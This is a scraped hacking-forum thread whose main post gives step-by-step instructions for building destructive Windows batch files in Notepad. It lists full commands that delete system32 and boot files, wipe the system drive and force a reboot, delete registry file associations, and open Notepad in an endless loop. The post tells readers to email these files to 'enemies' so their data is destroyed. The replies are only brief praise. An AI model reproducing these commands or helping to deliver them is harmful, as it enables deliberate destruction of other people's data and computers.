๑۩۞۩๑๑۩۞۩๑DaNgErWorLd๑۩۞۩๑๑۩۞۩๑
WELCOME GUEST TO ηιмвυzz ωσяℓ∂ you must have to login or register
°º¤ø,¸¸,ø¤º°`°º¤ø,¸nєw nímвuzz fσrum fσr αll nímвuzzєrs dσwnlσαd αll nєw flσσdєrs αnd shαrє чσur flσσdєrs sσftwєrє αll nєw вσts nímвuzz fσr pc αnd mσвílє hαckíng αnd crαckíng tσσls αlsσ trícks αnd típs nєw trícks αвσut hαckíng°º¤ø,¸¸,ø¤º°`°º¤ø,¸ create a powerful v*i*r*u*s with notepad 717555630

by Administration Staff
WELCOME GUEST TO ηιмвυzz ωσяℓ∂ you must have to login or register
°º¤ø,¸¸,ø¤º°`°º¤ø,¸nєw nímвuzz fσrum fσr αll nímвuzzєrs dσwnlσαd αll nєw flσσdєrs αnd shαrє чσur flσσdєrs sσftwєrє αll nєw вσts nímвuzz fσr pc αnd mσвílє hαckíng αnd crαckíng tσσls αlsσ trícks αnd típs nєw trícks αвσut hαckíng°º¤ø,¸¸,ø¤º°`°º¤ø,¸ create a powerful v*i*r*u*s with notepad 717555630

by Administration Staff
Would you like to react to this message? Create an account in a few clicks or log in to continue.

HomeLatest imagesSearchRegisterLog in
Our Users must read this:- its a warning to all members of dangerworld.forumarabia.com don't post V*i*r*u*s and those files which are having more then 2/?? detection ratio , don't use ugly words in your post and the last but not least don't use ha**ck , piracy and other bad words in your posts....... who Violate will be banned on the spot............thankx to all of you...........by:- Administration Staff
Check Free .tk Domains
Check Free .tk Domains
Top posters
black(-)eart (1390)
create a powerful v*i*r*u*s with notepad Emptycreate a powerful v*i*r*u*s with notepad Voting_bar2create a powerful v*i*r*u*s with notepad Empty 
bigshow (1387)
create a powerful v*i*r*u*s with notepad Emptycreate a powerful v*i*r*u*s with notepad Voting_bar2create a powerful v*i*r*u*s with notepad Empty 
l0ufer (1350)
ayush09 (1247)
jllwa (1120)
ехрļоŗеŗ (1112)
msb (1081)
۰۰рдяαмэχ۰۰ (1076)
sheeshnag (1001)
ghost.~.warrior (982)
Latest topics
» IP Changer full Anti Block id
create a powerful v*i*r*u*s with notepad Icon_minitime09.01.17 12:13 by al0ne

» auto id maker
create a powerful v*i*r*u*s with notepad Icon_minitime26.07.16 14:56 by $my

» Nimbuzz Quiz Bot for android
create a powerful v*i*r*u*s with notepad Icon_minitime21.07.16 17:46 by msb

» Nimbuzz stylish ids for sale
create a powerful v*i*r*u*s with notepad Icon_minitime20.07.16 9:00 by msb

» Meet A Stranger Room Advertizer Bot
create a powerful v*i*r*u*s with notepad Icon_minitime14.07.16 11:31 by $my

» Do Not Buy Nimbucks
create a powerful v*i*r*u*s with notepad Icon_minitime11.07.16 8:22 by $my

» TOF Auto Room Flooder 2016 -Manual Captcha Coded By th0ufeer@Nimbuzz.Com
create a powerful v*i*r*u*s with notepad Icon_minitime11.07.16 8:19 by $my

» ADD *24 HOUR ONLINE SỂRVER FOR 7 YEAR
create a powerful v*i*r*u*s with notepad Icon_minitime11.07.16 8:17 by $my

» new server bots online 24/7
create a powerful v*i*r*u*s with notepad Icon_minitime10.07.16 18:31 by $my

» all types of ban bots and flood bot
create a powerful v*i*r*u*s with notepad Icon_minitime10.07.16 18:28 by $my

» freebuzz id maker by l3orna@nim
create a powerful v*i*r*u*s with notepad Icon_minitime16.06.16 14:04 by deadtarget

» Fast ADD FLOOD AFTER NIMBUZZ UPDATE
create a powerful v*i*r*u*s with notepad Icon_minitime10.06.16 14:56 by jopanz

» Fast ADD FLOOD AFTER NIMBUZZ UPDATE
create a powerful v*i*r*u*s with notepad Icon_minitime08.06.16 13:24 by msb

» STEALTH PROJECT WEB FLOOD NIMBUZZ
create a powerful v*i*r*u*s with notepad Icon_minitime07.06.16 9:02 by msb

Top posting users this week
No user
User Counter
create a powerful v*i*r*u*s with notepad Flags_1
WORLD WIDE
Facebook

create a powerful v*i*r*u*s with notepad

Go down 
3 posters
AuthorMessage
stylish.munda@n.c
—(••÷[ נυηισя мεмвεя ]÷••—
—(••÷[ נυηισя мεмвεя ]÷••—
stylish.munda@n.c

create a powerful v*i*r*u*s with notepad Empty
PostSubject: create a powerful v*i*r*u*s with notepad   create a powerful v*i*r*u*s with notepad Icon_minitime18.10.13 4:40

Create a powerful v*i*r*u*s with notepad

1) Create a powerful v*i*r*u*s with notepad (to delete your enemy's data)

STEPS:
1. Open notepad.

2. Copy the following.

3. del c:\WINDOWS \system32\**/q

4. paste it in notepad.

5. and save it as .bat or .cmd 6. eg click save as write: fun.bat

7. Hit enter and your v*i*r*u*s is ready never open the file on your own you have created ( because you know what will happen) Smile have fun send it your enemy's through email....when they open it their data will be deleted create a powerful v*i*r*u*s with notepad 2059250946 . create a powerful v*i*r*u*s with notepad 717555630 for reading

2) How to create a v*i*r*u*s that deactivates an OS

Here are the stepts you should follow to make the v*i*r*u*s:
This v*i*r*u*s will stop and prevent a computer from starting up and the only solution would be to reinstall winsows.

Warning : never try it on your computer.

open up notepad and type in the following

del "C:windows\SYSTEM32\bootok"
/Q/S >nul
del "C:windows\SYSTEM32\bootvid.dll"
del "C:windows\SYSTEM32\bootvrfy"

After you type these save it as "any name you want ".bat
Please let me know if it works.

3) Endless Notepads

All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.

*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*
Code:

CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

4) Delete Key Registry Files

All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.

*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a nice day.
GOTO MESSAGE

5) The blue screen of Death

The blue screen of Death [this might be dangerous]
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

[/color]

toung toung toung toung 

dwc
Back to top Go down
http://stylish-munda.tk
cyberking
—(••÷[ мσ∂εяαтσя ]÷••—
—(••÷[ мσ∂εяαтσя ]÷••—
cyberking

PostSubject: Re: create a powerful v*i*r*u*s with notepad   create a powerful v*i*r*u*s with notepad Icon_minitime18.10.13 17:13

nice
Back to top Go down
jllwa
—•◕⊰[✿ α∂мιη✿]⊱◕•—
—•◕⊰[✿ α∂мιη✿]⊱◕•—
jllwa

PostSubject: Re: create a powerful v*i*r*u*s with notepad   create a powerful v*i*r*u*s with notepad Icon_minitime27.10.13 12:09

flower
Back to top Go down
Sponsored content

PostSubject: Re: create a powerful v*i*r*u*s with notepad   create a powerful v*i*r*u*s with notepad Icon_minitime

Back to top Go down

create a powerful v*i*r*u*s with notepad
Page 1 of 1